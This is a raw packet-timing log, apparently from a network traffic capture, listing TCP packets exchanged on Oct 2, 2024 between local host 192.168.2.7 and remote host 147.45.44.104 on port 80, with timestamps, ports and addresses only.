                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798173904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798209906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798209906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798382998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798393965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798402071 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798410892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798420906 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798430920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798430920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798441887 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798454046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.798459053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798470974 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.798515081 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.801609993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.828648090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828692913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828702927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828849077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828859091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.828891993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.828891993 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.829000950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.829018116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.829319000 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835295916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835330009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835339069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835376978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835376978 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835429907 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835473061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835572958 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835582972 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835592985 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835616112 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835616112 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835777044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835786104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835791111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835796118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835865974 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.835936069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.835973024 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836035013 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836044073 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836049080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836059093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836076021 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836180925 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836261988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836278915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836297035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836306095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836316109 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836342096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836342096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836615086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836627960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836642981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836653948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836663961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836673975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.836690903 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836690903 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.836734056 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837075949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837086916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837096930 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837105036 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837115049 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837125063 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837135077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837136030 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837136030 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837146997 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837174892 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837174892 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837539911 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837551117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837559938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837568998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837594032 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837594032 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837598085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837610006 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837620020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837630033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837640047 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837650061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.837656021 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837656021 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.837675095 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838239908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838251114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838259935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838270903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838279963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838289976 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838303089 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838303089 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838304996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838330030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838340998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838344097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838344097 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838356972 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838362932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838368893 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838373899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.838396072 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838396072 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.838684082 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839041948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839054108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839065075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839162111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839167118 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839174986 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839183092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839198112 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839365005 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839375973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839390039 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839399099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839404106 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839410067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839420080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839430094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839431047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839431047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839468956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839757919 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839767933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839777946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839787960 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839797020 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839809895 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839811087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839823008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839832067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839840889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839850903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839859962 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839859962 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839860916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839871883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839896917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839910030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.839915037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839915037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.839947939 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840718031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840728998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840739012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840764046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840774059 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840775013 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840785027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840796947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840805054 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840810061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840817928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840817928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840822935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840833902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840845108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840858936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840858936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840873957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840884924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.840917110 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.840917110 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841664076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841675997 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841689110 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841698885 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841710091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841717958 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841732025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841736078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841736078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841758966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841768980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841769934 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841784954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841795921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841805935 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841814995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841820955 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841820955 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841825962 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.841871977 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.841871977 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.884819984 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.915543079 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915555954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915568113 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915604115 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.915699959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915715933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915741920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915752888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.915777922 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.915777922 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922384024 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922394037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922400951 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922463894 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922498941 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922527075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922538042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922549009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922615051 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922703981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922719002 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922874928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922884941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922895908 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.922910929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922910929 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.922986984 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923152924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923161983 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923175097 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923186064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923197031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923207045 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923218012 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923218012 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923310995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923476934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923640966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923650980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923662901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923674107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923683882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923688889 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923693895 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923705101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923716068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.923717022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923717022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.923751116 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924139023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924149990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924160004 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924216986 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924381018 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924388885 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924398899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924407959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924417973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924418926 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924429893 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924438000 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924446106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924454927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924464941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924474955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924480915 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924484968 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924496889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924508095 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.924510956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924510956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924544096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.924544096 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925221920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925232887 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925242901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925251961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925261021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925271034 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925281048 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925286055 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925286055 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925292015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925302982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925312996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925323963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925326109 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925326109 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925333023 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925344944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.925383091 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.925383091 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926167011 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926177025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926184893 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926189899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926198959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926202059 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926225901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926237106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926246881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926256895 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926263094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926263094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926282883 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926579952 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926589966 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926599026 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926634073 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.926637888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926649094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926656961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926666975 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.926676989 CEST8049702147.45.44.104192.168.2.7
